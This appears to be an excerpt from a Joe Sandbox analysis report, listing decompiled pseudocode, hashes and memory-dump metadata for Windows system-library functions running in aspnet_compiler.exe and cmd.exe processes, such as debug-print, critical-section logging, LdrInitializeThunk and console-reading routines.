Opcode Fuzzy Hash: 5711c547670329092d6e6799417257d101a4c467627f0d801e3d6fd5d39c782c
Instruction Fuzzy Hash: 5D90027120101842D50461999504B460005A7E0351F61C01AE4115754DC755C8717561

Uniqueness

Uniqueness Score: -1.00%

Function 01119670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 1f00f695a779639e65221679c6d97184b171d6ee1ba7f2d8637febc2b1b49f2c
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0110645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0110645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x11cd360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E0111FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E010F2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E010EFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x11cb1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E0111B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x0110645b
0x01106463
0x0110646d
0x01106475
0x0110647a
0x0110647e
0x01106480
0x0110648c
0x01106490
0x01106495
0x01106498
0x0110649b
0x0110649f
0x011064a1
0x01147c07
0x01147c09
0x01147c0c
0x00000000
0x011064a7
0x011064a7
0x011064aa
0x01147bf7
0x01147c00
0x00000000
0x01147bf9
0x01147bf9
0x01147bf9
0x011064b0
0x011064b0
0x011064b2
0x011064b2
0x011064b3
0x011064ba
0x01106553
0x0110655e
0x01106566
0x0110656c
0x01106575
0x0110657f
0x01106585
0x01106588
0x01106588
0x011064c7
0x011064cb
0x011064ce
0x011064d3
0x011064da
0x011064e5
0x011064ed
0x011064f1
0x011064f5
0x011064f6
0x011064fa
0x01106502
0x01106503
0x01106504
0x01106507
0x0110651a
0x01106524
0x01106524
0x01106526
0x01106526
0x011064aa
0x0110652c
0x0110652d
0x0110652e
0x01106539

APIs

RtlDebugPrintTimes.NTDLL ref: 0110651A

Strings

0, xrefs: 011064E5
0, xrefs: 011064FA

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: c8c73a70674e250bd38b9e7dac2fef8e613decf9239957c417b83920e98af556
Instruction ID: c39f1eb193daa5b1b01852533bd4ad3fe809e60a624a640dc50abd4ee96d0b8a
Opcode Fuzzy Hash: c8c73a70674e250bd38b9e7dac2fef8e613decf9239957c417b83920e98af556
Instruction Fuzzy Hash: 0D418CB1A087069FC315CF28C444A1ABBE5FF89718F05492EF588DB341D771EA15CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0116FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0116FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0111CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01165720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01165720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0116fdda
0x0116fde2
0x0116fde5
0x0116fdec
0x0116fdfa
0x0116fdff
0x0116fe0a
0x0116fe0f
0x0116fe17
0x0116fe1e
0x0116fe19
0x0116fe19
0x0116fe19
0x0116fe20
0x0116fe21
0x0116fe22
0x0116fe25
0x0116fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0116FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0116FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0116FE01

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 3f586175cb512d2e857d21d04279b239d1d597e831fae81be59568fe40c7f2e5
Instruction ID: 544bbb7e4de2c13d8d440c863be1ff725d1b728d5bc6d9de64a5ca261d89fc7d
Opcode Fuzzy Hash: 3f586175cb512d2e857d21d04279b239d1d597e831fae81be59568fe40c7f2e5
Instruction Fuzzy Hash: FFF0F632240602BFE6281A45DC02F23BF5EEB44B70F154318F6685A5D1DB63F83086F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmd.exePID: 5916, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.6%
Total number of Nodes:	165
Total number of Limit Nodes:	10

Executed Functions

Function 02C896D0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C896DA

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f75dc857a4f5b142508a2ab502052b0157a4625377f54aa25ca26ef165549ae8
Instruction ID: 28c235212581c056f5b0dc1e6f37f25e2505d03a0dd4aa40b7019e68bdc6036e
Opcode Fuzzy Hash: f75dc857a4f5b142508a2ab502052b0157a4625377f54aa25ca26ef165549ae8
Instruction Fuzzy Hash: F59002B120140942D50071594508B47010597E0341F61C016A0125654D8655CC51B571

Uniqueness

Uniqueness Score: -1.00%

Function 02C896E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C896EA

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2619efce590d34465bd2ae6cd9f8f33c2889ae6fbc660b9f5e61fb8c75d5bd95
Instruction ID: c4ec27c5eed1408eed8630dc8da61166d25b39a987fd298b52ff843286ed161a
Opcode Fuzzy Hash: 2619efce590d34465bd2ae6cd9f8f33c2889ae6fbc660b9f5e61fb8c75d5bd95
Instruction Fuzzy Hash: D19002B120148902D5107159850874B010597D0341F65C411A4425658D86D58C91B171

Uniqueness

Uniqueness Score: -1.00%

Function 02C89A50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C89A5A

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2dc5efbd812f532c91bd5ea7edf6613676f19d494f581dea2fcce0a090c0fa8a
Instruction ID: 40f88649ed7d2a650f9a5970058e7d15918a5ebbce80f8adbcd9dcd0346040de
Opcode Fuzzy Hash: 2dc5efbd812f532c91bd5ea7edf6613676f19d494f581dea2fcce0a090c0fa8a
Instruction Fuzzy Hash: 4E9002B1211C0142D60075694D18B07010597D0343F61C115A0155554CC9558C61A571

Uniqueness

Uniqueness Score: -1.00%

Function 02C89FE0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C89FEA

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bc27c97ac7e2dc1bfab2dd948c4726c9cdb7eab16a1c014694840720eeade16
Instruction ID: 08510dcfcc1a7f2d4da9fab7c42a0e7b82818ba1fb676a7d7c1a939d9c60828f
Opcode Fuzzy Hash: 8bc27c97ac7e2dc1bfab2dd948c4726c9cdb7eab16a1c014694840720eeade16
Instruction Fuzzy Hash: D59002B131154502D51071598508707010597D1241F61C411A0825558D86D58C91B172

Uniqueness

Uniqueness Score: -1.00%

Function 02C89780 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C8978A

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0852ff2acc9f7743aad63ba780ce72339def095589cf9ba2ab1745fb6f915eb8
Instruction ID: e2785759a9c6baadab3a2a6194d235852e16f07f9492b173a7268272683c349a
Opcode Fuzzy Hash: 0852ff2acc9f7743aad63ba780ce72339def095589cf9ba2ab1745fb6f915eb8
Instruction Fuzzy Hash: 999002B921340102D5807159550C60B010597D1242FA1D415A0016558CC9558C69A371

Uniqueness

Uniqueness Score: -1.00%

Function 02C89710 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C8971A

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cacea3d2001e30283b42396ce0b0ef1d3dbdb466b9ade218037abe3622e4c0b7
Instruction ID: 85cd19ca59d7de64fd0aa0355f8c86cc2b18c6bad628dd44e537eb361971fb5d
Opcode Fuzzy Hash: cacea3d2001e30283b42396ce0b0ef1d3dbdb466b9ade218037abe3622e4c0b7
Instruction Fuzzy Hash: 6E9002B120140502D5007599550C647010597E0341F61D011A5025555EC6A58C91B171

Uniqueness

Uniqueness Score: -1.00%

Function 02C89840 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C8984A

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46154b65fce0da0568a3a1e10385432eac0b0e70890025aba017a80aab30e695
Instruction ID: da24b53861fa7038c1b19cd2e0d90d2019d85244b95158a18bf9baada23cfaba
Opcode Fuzzy Hash: 46154b65fce0da0568a3a1e10385432eac0b0e70890025aba017a80aab30e695
Instruction Fuzzy Hash: BE9002B1242442525945B15945085074106A7E02817A1C012A1415950C85669C56E671

Uniqueness

Uniqueness Score: -1.00%

Function 02C89860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C8986A

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24b9f4d73947ac0408560145cd91098279e0746d55a5dfe2bbd6708ea73503d0
Instruction ID: 8e2ccae21df06da37bacc84d23c42b2937640036ec1ded7706b8388ab6a200bb
Opcode Fuzzy Hash: 24b9f4d73947ac0408560145cd91098279e0746d55a5dfe2bbd6708ea73503d0
Instruction Fuzzy Hash: 149002B120140513D51171594608707010997D0281FA1C412A0425558D96968D52F171

Uniqueness

Uniqueness Score: -1.00%

Function 02C895D0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C895DA

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 688efcae97eddfdf9774eb680fc4a76f5bb24add5081764471ab0b388836cc62
Instruction ID: 7b235a700cb828ecb2252a08881b46f0dda9a5692907d575607d7acbc978910d
Opcode Fuzzy Hash: 688efcae97eddfdf9774eb680fc4a76f5bb24add5081764471ab0b388836cc62
Instruction Fuzzy Hash: 6F9002F120240103450571594518617410A97E0241B61C021E1015590DC5658C91B175

Uniqueness

Uniqueness Score: -1.00%

Function 02C899A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C899AA

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f39b7292763e478120afbeeedd321be3172c04df325f6c5106d12886b98fd638
Instruction ID: 586d208bf65ba6dcde106cadb32333cf05adb97e459ab489b54c5cf8ed750e88
Opcode Fuzzy Hash: f39b7292763e478120afbeeedd321be3172c04df325f6c5106d12886b98fd638
Instruction Fuzzy Hash: E49002F134140542D50071594518B070105D7E1341F61C015E1065554D8659CC52B176

Uniqueness

Uniqueness Score: -1.00%

Function 02C89540 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C8954A

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b338dcc348cd99e2d29838734fcc61099d4fc893d8482a9985d1822ae07797b7
Instruction ID: 1468a010854baf43cba2c1ec1eecaaff15120ab3c6d6587eeb965f16b9f39645
Opcode Fuzzy Hash: b338dcc348cd99e2d29838734fcc61099d4fc893d8482a9985d1822ae07797b7
Instruction Fuzzy Hash: 289002B5211401030505B5590708507014697D5391361C021F1016550CD6618C61A171

Uniqueness

Uniqueness Score: -1.00%

Function 02C89910 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C8991A

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba68195df5676738c73d0d105a409db883d8ca145f21a4be63efe6727a20a489
Instruction ID: d2aa27d44a1555681d85e14988b11c53d7a10d4a50cdd0c4b3b63751a9dc1394
Opcode Fuzzy Hash: ba68195df5676738c73d0d105a409db883d8ca145f21a4be63efe6727a20a489
Instruction Fuzzy Hash: E19002F120140502D54071594508747010597D0341F61C011A5065554E86998DD5B6B5

Uniqueness

Uniqueness Score: -1.00%

Function 02C8967A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C89694

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b7dd583ded311c163161243199b54744fba5f505f784bc4aeb5ac0863ff45dd6
Instruction ID: 1291e3330a6e7a62d267462d4eb3ac7dd00d483b252445688d848eb5dd5b28c1
Opcode Fuzzy Hash: b7dd583ded311c163161243199b54744fba5f505f784bc4aeb5ac0863ff45dd6
Instruction Fuzzy Hash: 6AB092B29028D6CAEA51F7A04B0CB3B7A10BBD0745F26C062E2031691A4778C591F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001D3506 Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353
memoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E001D3506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
				signed int _v8;
				signed int _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				unsigned int _v36;
				intOrPtr _v40;
				unsigned int _v44;
				intOrPtr _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				signed int _v68;
				void* _v76;
				void* _v80;
				DWORD* _v84;
				long _v88;
				void* _v90;
				signed int _v92;
				int _v96;
				void* _v100;
				long _v108;
				signed int _v112;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				void* _t85;
				int _t86;
				int _t87;
				int _t93;
				signed int _t95;
				void* _t99;
				void* _t104;
				void* _t105;
				void _t106;
				void _t107;
				signed int _t108;
				void* _t118;
				void _t119;
				signed int _t133;
				signed int _t134;
				void* _t141;
				void* _t142;
				long _t143;
				void* _t147;
				signed char _t149;
				signed int _t152;
				void* _t156;
				signed int _t157;
				void* _t159;
				void* _t163;
				void* _t168;
				void* _t169;
				int _t170;
				void* _t177;
				void* _t178;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t185;
				DWORD* _t187;
				void* _t189;
				struct _COORD _t190;
				signed int _t191;
				signed int _t193;
				void* _t196;
				void* _t197;
				void* _t206;
				void* _t207;

				_t173 = __edx;
				_t193 = (_t191 & 0xfffffff8) - 0x54;
				_t83 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t83 ^ _t193;
				_t187 = _a8;
				_t184 = __edx;
				_v56.dwCursorPosition = __ecx;
				_v80 = _t187;
				_t85 = GetStdHandle(0xfffffff5);
				_v76 = _t85;
				if(_t85 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v76 = _t85;
				}
				if( *0x1f3cc9 == 0) {
					L66:
					__imp__AcquireSRWLockShared(0x1f7f20);
					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
					__imp__ReleaseSRWLockShared(0x1f7f20);
					_t87 = _t86;
				} else {
					_t147 = 0x20;
					_t196 =  *0x1dd0d8 - _t147; // 0x20
					if(_t196 >= 0) {
						goto L66;
					} else {
						_t197 =  *0x1dd0d4 - _t147; // 0x20
						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
							goto L66;
						} else {
							_t149 =  *0x1dd0d8; // 0x20
							_t190 = _v32.dwCursorPosition;
							_t142 = 0;
							_t173 = 1 << _t149;
							asm("bts edx, eax");
							_v68 = _t190;
							_v56.wAttributes = 0x10;
							_v56.dwSize = 0;
							_v44 = 0;
							_v40 = 1;
							_v36 = 0;
							E001DB4DD( *0x1dd0d4 & 0x0000ffff);
							 *0x1dd580 = 0;
							 *0x1dd578 = 0;
							 *0x1dd574 = 0;
							 *0x1dd57c = 0;
							while(1) {
								L7:
								__imp__AcquireSRWLockShared(0x1f7f20);
								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
								_v92 = _t93;
								__imp__ReleaseSRWLockShared(0x1f7f20);
								_v68 =  *_v88;
								if( *0x1dd544 == 0) {
									_t95 = 0;
									__eflags = 0;
								} else {
									EnterCriticalSection( *0x1e3858);
									 *0x1dd544 = 0;
									LeaveCriticalSection( *0x1e3858);
									if(_t142 != 0) {
										RtlFreeHeap(GetProcessHeap(), 0, _t142);
									}
									_t95 = 0;
									_t142 = 0;
								}
								if(_v96 == 0) {
									break;
								}
								_t173 = _t173 | 0xffffffff;
								_v92 = _v92 | 0xffffffff;
								_v80 = _t95;
								if( *_v88 <= 0) {
									break;
								} else {
									while(1) {
										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
										if(_t152 == 0xd) {
											break;
										}
										_t206 = _t152 -  *0x1dd0d8; // 0x20
										if(_t206 == 0) {
											_v92 = _t95;
											goto L25;
										} else {
											_t207 = _t152 -  *0x1dd0d4; // 0x20
											if(_t207 == 0) {
												_v92 = _t95;
												_v80 = 1;
												L24:
												__eflags = _t173 - 0xffffffff;
												if(_t173 != 0xffffffff) {
													goto L18;
												} else {
													L25:
													__eflags = _t95 - 0xffffffff;
													if(_t95 == 0xffffffff) {
														goto L18;
													} else {
														 *_v88 = _t95;
														 *(_t184 + _t95 * 2) = 0;
														__eflags = _t142;
														if(_t142 == 0) {
															L35:
															_v96 = 1;
														} else {
															_t169 = _t142;
															_t133 = _t184;
															while(1) {
																_t181 =  *_t133;
																__eflags = _t181 -  *_t169;
																if(_t181 !=  *_t169) {
																	break;
																}
																__eflags = _t181;
																if(_t181 == 0) {
																	L32:
																	_t170 = 0;
																	_t134 = 0;
																} else {
																	_t182 =  *((intOrPtr*)(_t133 + 2));
																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
																		break;
																	} else {
																		_t133 = _t133 + 4;
